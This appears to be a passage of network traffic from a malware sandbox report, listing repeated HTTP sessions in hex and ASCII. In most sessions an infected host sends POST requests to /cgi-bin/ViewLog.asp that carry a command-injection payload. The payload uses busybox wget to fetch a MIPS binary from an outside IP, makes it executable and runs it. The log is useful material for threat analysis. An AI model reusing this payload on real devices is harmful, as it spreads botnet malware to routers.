                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 43 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 69 66 78 3d 22 75 72 6e 3a 64 73 6c 5f 61 70 69 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 53 4f 41 50 2d 45 4e 56 3a 46 61 75 6c 74 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 66 61 75 6c 74 63 6f 64 65 3e 53 4f 41 50 2d 45 4e 56 3a 53 65 72 76 65 72 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 3e 54 69 6d 65 6f 75 74 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 53 4f 41 50 2d 45 4e 56 3a 44 65 74 61 69 6c 3e 61 63 63 65 70 74 20 66 61 69 6c 65 64 20 69 6e 20 73 6f 61 70 5f 61 63 63 65 70 74 28 29 3c 2f 53 4f 41 50 2d 45 4e 56 3a 44 65 74 61 69 6c 3e 3c 2f 53 4f 41 50 2d 45 4e 56 3a 46 61 75 6c 74 3e 3c 2f 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 2f 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a
                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:ifx="urn:dsl_api"><SOAP-ENV:Body><SOAP-ENV:Fault SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><faultcode>SOAP-ENV:Server</faultcode><faultstring>Timeout</faultstring><SOAP-ENV:Detail>accept failed in soap_accept()</SOAP-ENV:Detail></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              524192.168.2.145518031.173.160.2178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:48.620563030 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:48.878042936 CET544INHTTP/1.1 400 Bad Request
                                              Content-Type: text/html; charset=us-ascii
                                              Server: Microsoft-HTTPAPI/2.0
                                              Date: Thu, 23 Nov 2023 04:17:46 GMT
                                              Connection: close
                                              Content-Length: 311
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              525192.168.2.144234085.100.188.828080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:48.655478954 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              526192.168.2.145913462.243.38.2388080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:48.817452908 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:49.009315014 CET1340INHTTP/1.1 403 Forbidden
                                              Server: Apache-Coyote/1.1
                                              Set-Cookie: JSESSIONID=-zM83gBZhbpp-kAeS5hnTDWl; Path=/
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 1199
                                              Date: Thu, 23 Nov 2023 04:16:19 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 42 6f 73 73 20 57 65 62 2f 37 2e 30 2e 31 37 2e 46 69 6e 61 6c 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 33 20 2d 20 54 68 65 20 72 65 71 75 65 73 74 20 62 6f 64 79 20 77 61 73 20 74 6f 6f 20 6c 61 72 67 65 20 74 6f 20 62 65 20 63 61 63 68 65 64 20 64 75 72 69 6e 67 20 74 68 65 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 70 72 6f 63 65 73 73 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 20 62 6f 64 79 20 77 61 73 20 74 6f 6f 20 6c 61 72 67 65 20 74 6f 20 62 65 20 63 61 63 68 65 64 20 64 75 72 69 6e 67 20 74 68 65 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 70 72 6f 63 65 73 73 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 73 70 65 63 69 66 69 65 64 20 72 65 73 6f 75 72 63 65 20 28 54 68 65 20 72 65 71 75 65 73 74 20 62 6f 64 79 20 77 61 73 20 74 6f 6f 20 6c 61 72 67 65 20 74 6f 20 62 65 20 63 61 63 68 65 64 20 64 75 72 69 6e
                                              Data Ascii: <html><head><title>JBoss Web/7.0.17.Final - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 403 - The request body was too large to be cached during the authentication process</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>The request body was too large to be cached during the authentication process</u></p><p><b>description</b> <u>Access to the specified resource (The request body was too large to be cached durin


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              527192.168.2.144726094.79.181.2308080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:48.843353033 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:49.043224096 CET558INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=us-ascii
                                              Server: Microsoft-HTTPAPI/2.0
                                              Date: Thu, 23 Nov 2023 04:17:36 GMT
                                              Connection: close
                                              Content-Length: 315
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              528192.168.2.145926095.214.235.508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:48.844819069 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              529192.168.2.145337094.122.27.1018080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:48.866636992 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              530192.168.2.143561094.121.176.2148080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:48.874456882 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              531192.168.2.145927295.214.235.508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:49.066392899 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              532192.168.2.144157094.121.105.138080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:49.090451002 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              533192.168.2.145879294.122.114.598080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:49.093039036 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              534192.168.2.143400094.122.88.1148080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:49.094110966 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              535192.168.2.144237085.100.188.828080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:49.095122099 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              536192.168.2.144213631.136.146.798080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:49.095302105 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:49.666089058 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
